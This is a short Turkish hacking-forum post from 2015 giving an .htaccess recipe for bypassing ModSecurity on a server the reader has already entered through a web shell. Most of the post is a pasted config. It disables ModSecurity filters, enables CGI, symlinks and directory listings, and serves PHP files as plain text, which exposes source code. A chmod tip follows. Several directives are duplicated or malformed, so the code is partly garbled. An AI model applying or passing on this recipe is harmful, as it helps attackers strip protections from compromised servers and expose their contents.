Mod Security Bypass Etme

Ekleyen: Admin Tarih: Cuma, Mayıs 15, 2015

bazı serverlere girdiginizde mod security hatası verir bunun bircok bypass etme taktigi vardır. Buda onlardan biri


Öncellikle shellli açip > .htaccess dosyasini bulup düzenleyelim içindeki tüm kodları silelim.

Kod:

Addhandler writed by hcinou
DirectoryIndex index.html
<Directory />
Options FollowSymLinks
Options All +Indexes +FollowSymLinks
Options All +ExecCGI
Options All +Indexes
Options All +FollowSymLinks
Options All +SymLinksIfOwnerMatch
Options All +MultiViews
Options All +Includes
Options All +IncludesNOEXEC
Options All +IndexOptions +FancyIndexing
AllowOverride None
AllowOverride All
order allow,deny
allow from all
</Directory>
AddType text/plain .php
AddType text/plain .htaccess
AddHandler server-parsed .php
Addhandler cgi-script .asp
ForceType application/x-httpd-php4
HeaderName 1.txt
ReadmeName 1.txt
AddDefaultCharset utf-8
RewriteEngine On
RewriteRule ^sitemap.xml/?$ md_sitemap.php [QSA,NC,L]
RewriteRule ^src/(.*)/page/([0-9]+)/?$ index.php?src=$1&page=$2 [QSA,NC,L]
RewriteRule ^src/(.*)/?$ index.php?src=$1 [QSA,NC,L]
RewriteRule ^web/(.*) web.php?url=$1 [QSA,NC,L]
RewriteRule (.*).was$ $1.was
RewriteRule .* – [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} -f [OR]
RewriteCond %{REQUEST_FILENAME} -d
RewriteRule ^(.+) – [PT,L]
RewriteRule ^(.*) index.php
</IfModule>
<IfModule Mod_security.c>
SecFilterEngine OFF SecFilterEngine OFF
SecFilterScanPort OFF SecFilterScanPort OFF
SecFilterCheckURLEncoding OFF SecFilterCheckURLEncoding OFF
SecFilterCheckUnicodeEncoding OFF SecFilterCheckUnicodeEncoding OFF
RewriteRule (.*).was$ $1.was
</IfModule> </ IfModule>

Ekliyoruz ve bypass edildi. Çalişmaz ise önce deneyin çalişmaz ise chmod degerini 755 verip tekrar deneyin